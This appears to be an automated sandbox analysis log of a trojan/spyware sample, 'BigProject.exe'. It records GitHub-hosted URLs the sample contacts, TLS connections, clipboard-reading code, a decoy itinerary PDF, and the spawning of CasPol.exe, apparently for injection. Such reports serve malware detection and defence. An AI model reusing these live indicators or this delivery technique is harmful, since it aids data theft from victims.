Source: BigProject.exe, 00000000.00000002.2453321140.00000000011A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion8Nzk
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiionC
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiionD
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiionw
Source: BigProject.exe, 00000000.00000002.2453321140.0000000001183000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/Q
Source: CasPol.exe, 00000007.00000002.2452004141.0000000003440000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49773 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 7_2_004329C0
Contains functionality to read the clipboard data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 7_2_004329C0
Detected potential crypto function
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00CA4EB1 0_2_00CA4EB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00408850 7_2_00408850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00423860 7_2_00423860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004218A0 7_2_004218A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042DA53 7_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043ECA0 7_2_0043ECA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00437DF0 7_2_00437DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00409580 7_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004266D0 7_2_004266D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043F720 7_2_0043F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00415799 7_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00438810 7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041682D 7_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004288CB 7_2_004288CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043D880 7_2_0043D880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00430940 7_2_00430940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00403970 7_2_00403970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00420939 7_2_00420939
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004179C1 7_2_004179C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004231C2 7_2_004231C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004241C0 7_2_004241C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043B1D0 7_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004291DD 7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043D980 7_2_0043D980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00405990 7_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00422190 7_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043D997 7_2_0043D997
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043D999 7_2_0043D999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004091B0 7_2_004091B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042CA49 7_2_0042CA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00416263 7_2_00416263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0040EA10 7_2_0040EA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00415220 7_2_00415220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042CAD0 7_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004252DD 7_2_004252DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041B2E0 7_2_0041B2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00406280 7_2_00406280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043DA80 7_2_0043DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041E290 7_2_0041E290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041CB40 7_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043D34D 7_2_0043D34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00426B50 7_2_00426B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043DB60 7_2_0043DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00436B08 7_2_00436B08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042830D 7_2_0042830D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042CB11 7_2_0042CB11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00404320 7_2_00404320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042CB22 7_2_0042CB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00425327 7_2_00425327
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00408330 7_2_00408330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043F330 7_2_0043F330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042A33F 7_2_0042A33F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0040DBD9 7_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00424380 7_2_00424380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041FC75 7_2_0041FC75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041DC00 7_2_0041DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00429C2B 7_2_00429C2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004291DD 7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004074F0 7_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0040ACF0 7_2_0040ACF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041148F 7_2_0041148F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042AC90 7_2_0042AC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0040CD46 7_2_0040CD46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00437500 7_2_00437500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00422510 7_2_00422510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00417DEE 7_2_00417DEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041759F 7_2_0041759F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00425E70 7_2_00425E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00436E74 7_2_00436E74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00427603 7_2_00427603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00425E30 7_2_00425E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004286C0 7_2_004286C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043AEC0 7_2_0043AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004236E2 7_2_004236E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00405EE0 7_2_00405EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041DE80 7_2_0041DE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00402F50 7_2_00402F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00420F50 7_2_00420F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00438F59 7_2_00438F59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00406710 7_2_00406710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00423F20 7_2_00423F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00419F30 7_2_00419F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0041E7C0 7_2_0041E7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004197C2 7_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0042DFE9 7_2_0042DFE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0040A780 7_2_0040A780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00411F90 7_2_00411F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00418792 7_2_00418792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043EFB0 7_2_0043EFB0
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00408030 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00414400 appears 65 times
Sample file is different than original file name gathered from version info
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAcrobat.exe< vs BigProject.exe
Uses 32bit PE files
Source: BigProject.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/46@7/2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW, 7_2_00437DF0
Source: C:\Users\user\Desktop\BigProject.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\NavanItinerary[1].pdf Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe File created: C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf Jump to behavior
Source: BigProject.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BigProject.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: BigProject.exe Virustotal: Detection: 15%
Source: BigProject.exe ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Users\user\Desktop\BigProject.exe "C:\Users\user\Desktop\BigProject.exe"
Source: C:\Users\user\Desktop\BigProject.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1508,i,10346652073434978683,7564369482762319465,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\Desktop\BigProject.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\Desktop\BigProject.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf" Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1508,i,10346652073434978683,7564369482762319465,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
